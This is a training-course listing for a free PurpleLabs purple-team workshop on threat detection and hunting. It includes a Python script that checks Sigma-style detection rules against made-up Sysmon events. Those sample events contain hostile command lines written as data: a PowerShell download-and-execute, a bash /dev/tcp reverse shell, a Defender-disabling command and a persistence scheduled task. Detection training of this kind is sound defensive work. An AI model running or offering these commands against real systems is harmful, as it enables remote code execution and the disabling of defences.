Free Workshop: Threat Detection and Hunting with PurpleLabs #2 [16 March]

$0.00

Duration

1 day

Delivery Method

virtual

Level

intermediate

Seats Available

20

DELIVERY: VIRTUAL LIVE STREAM 

DISCORD :  https://discord.gg/XM86uPxxBZ

DATE: 16 March 2021 

TIME: 19:00 to 21:00 CET/GMT+1

The first workshop of the PurpleLabs series generated a great deal of interest in the scope of detection and threat hunting!

For the first 5 registrations, Leszek will provide 7 days of full access to the PurpleLabs environment, which comes with a set of 60+ hands-on lab instructions structured as purple-team exercises (attack step paired with its detection).

During session #1 we covered how to obtain the network and OS visibility/telemetry needed for advanced detection using open-source / free tools. We ran a few simple hunting examples and showed how to use Sigma / Sentinel rules as hints/guides for learning in the "detection vs attack" formula.

We need to keep learning how adversaries operate, so after a good introduction to the subject it is time for the next step.
During hands-on session #2*, Leszek is going to demonstrate how to create and simulate attack-chain steps such as:
  • Rundll32 communicating with public IP addresses
  • CMSTP Execution
  • Mshta executing VBScript
  • Disabling Windows Defender / modifying Windows Firewall
  • Suspicious non-browser process accessing a suspicious URL
  • Suspicious scheduled task creation
  • Powershell execution with IP arguments
  • Malicious Named Pipe
  • Suspicious Linux Reverse Shell Command Line
  • Linux kernel space rootkit
  • and more
and provide detection coverage for these tactics, techniques, and procedures (TTPs) using the PurpleLabs stack:
  • HELK + ElastAlert
  • Sigma rules
  • Sysmon + Windows Events
  • Splunk
  • ElastiFlow
  • Moloch FPC
  • Suricata IDS
  • Zeek IDS
  • Wazuh
  • Velociraptor
  • OSquery
  • Graylog
  • Falco
  • Syslog

* This is a continuation of the topic from the first session.
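As an added illustration of the "generate evil, then detect it" pairing the session is built around (this is example code written for this page, not PurpleLabs content and not any published Sigma rule), the block below expresses several of the chain steps listed above as detection predicates and runs them over a handful of constructed Sysmon-style records: Event ID 1 (process creation), Event ID 3 (network connection) and one Linux execve-style record in the same shape. The events, paths, addresses, field names and matching logic are all assumptions made for the example.

```python
"""Toy detection pass over constructed Sysmon-style events, covering several of
the chain steps listed above. The events, field names and rule logic are
assumptions made for this example, not PurpleLabs content or published Sigma rules."""
import ipaddress
import re
from typing import Callable, Dict, List, Tuple

# Constructed sample telemetry: Sysmon Event ID 1 (process creation) and
# Event ID 3 (network connection) flattened to dicts, plus one Linux execve
# record in the same shape. Addresses and paths are made up for the example.
EVENTS: List[dict] = [
    {"id": 3, "Image": r"C:\Windows\System32\rundll32.exe",
     "DestinationIp": "8.8.8.8", "DestinationPort": 443},
    {"id": 3, "Image": r"C:\Windows\System32\rundll32.exe",
     "DestinationIp": "10.0.0.5", "DestinationPort": 445},          # internal, benign
    {"id": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": 'mshta.exe vbscript:CreateObject("Wscript.Shell").Run("calc.exe")'},
    {"id": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://198.51.100.7/a.ps1')"},
    {"id": 1, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r"schtasks /create /sc minute /mo 5 /tn Updater /tr C:\Users\Public\upd.exe"},
    {"id": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"id": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\bob\notes.txt"},             # benign
    {"id": "execve", "Image": "/bin/bash",
     "CommandLine": "bash -i >& /dev/tcp/192.0.2.9/4444 0>&1"},
]

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def is_public_ip(addr: str) -> bool:
    """True for a globally routable address; RFC 1918, loopback, link-local etc. are excluded."""
    try:
        return ipaddress.ip_address(addr).is_global
    except ValueError:
        return False


def image_name(ev: dict) -> str:
    """Basename of the executing image, normalised for Windows and Linux paths."""
    return ev.get("Image", "").replace("\\", "/").rsplit("/", 1)[-1].lower()


def cmdline(ev: dict) -> str:
    return ev.get("CommandLine", "")


# Each rule is a predicate over one event; names loosely follow the workshop list.
def rundll32_public_ip(ev: dict) -> bool:
    return ev["id"] == 3 and image_name(ev) == "rundll32.exe" \
        and is_public_ip(ev.get("DestinationIp", ""))


def mshta_vbscript(ev: dict) -> bool:
    return ev["id"] == 1 and image_name(ev) == "mshta.exe" \
        and "vbscript:" in cmdline(ev).lower()


def powershell_ip_argument(ev: dict) -> bool:
    return ev["id"] == 1 and image_name(ev) == "powershell.exe" \
        and IPV4.search(cmdline(ev)) is not None


def scheduled_task_creation(ev: dict) -> bool:
    return ev["id"] == 1 and image_name(ev) == "schtasks.exe" \
        and "/create" in cmdline(ev).lower()


def defender_disabled(ev: dict) -> bool:
    cl = cmdline(ev).lower()
    return ev["id"] == 1 and "set-mppreference" in cl and "-disablerealtimemonitoring" in cl


def linux_reverse_shell(ev: dict) -> bool:
    # bash's /dev/tcp pseudo-device plus an fd redirection is the classic one-liner
    cl = cmdline(ev)
    return ev["id"] == "execve" and "/dev/tcp/" in cl and re.search(r"\d>&\d", cl) is not None


RULES: Dict[str, Callable[[dict], bool]] = {
    "rundll32_public_ip": rundll32_public_ip,
    "mshta_vbscript": mshta_vbscript,
    "powershell_ip_argument": powershell_ip_argument,
    "scheduled_task_creation": scheduled_task_creation,
    "defender_disabled": defender_disabled,
    "linux_reverse_shell": linux_reverse_shell,
}


def run_rules(events: List[dict] = EVENTS) -> List[Tuple[str, str]]:
    """Return (rule, evidence) pairs; evidence is the command line or destination IP."""
    hits = []
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                hits.append((name, cmdline(ev) or ev.get("DestinationIp", "")))
    return hits


if __name__ == "__main__":
    for rule, evidence in run_rules():
        print(f"[{rule}] {evidence}")
```

Each predicate is deliberately as narrow as the corresponding Sigma-style idea (image basename plus one or two command-line or destination conditions), which is why the internal rundll32 connection and the notepad record produce no hit; in a real pipeline the same predicates would be fed by Sysmon/Wazuh/Velociraptor output rather than an inline list, and the noisy ones (an IP in a PowerShell argument, any schtasks /create) would need the environment-specific exclusions the workshop is about.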

For those who want to know more about this hands-on cyber range project, here’s the all-in-one picture:

Why You Should Take This Course

TBA

Who Should Attend

TBA

Key Learning Objectives

  • Find out how Detection / Hunting Open Source Software can support your SOC infrastructure & team.

  • Learn ways to improve detection and sharpen your event correlation skills across many different data sources

  • Generate evil, find the malicious activities, and identify threat details on the network

  • Prepare your SOC team for fast filtering out network noise and allow for better incident response handling

  • Understand the value of manual and automated approaches to simulating attackers and generating anomalies

Prerequisite Knowledge

TBA

Hardware / Software Requirements

TBA

Your Instructor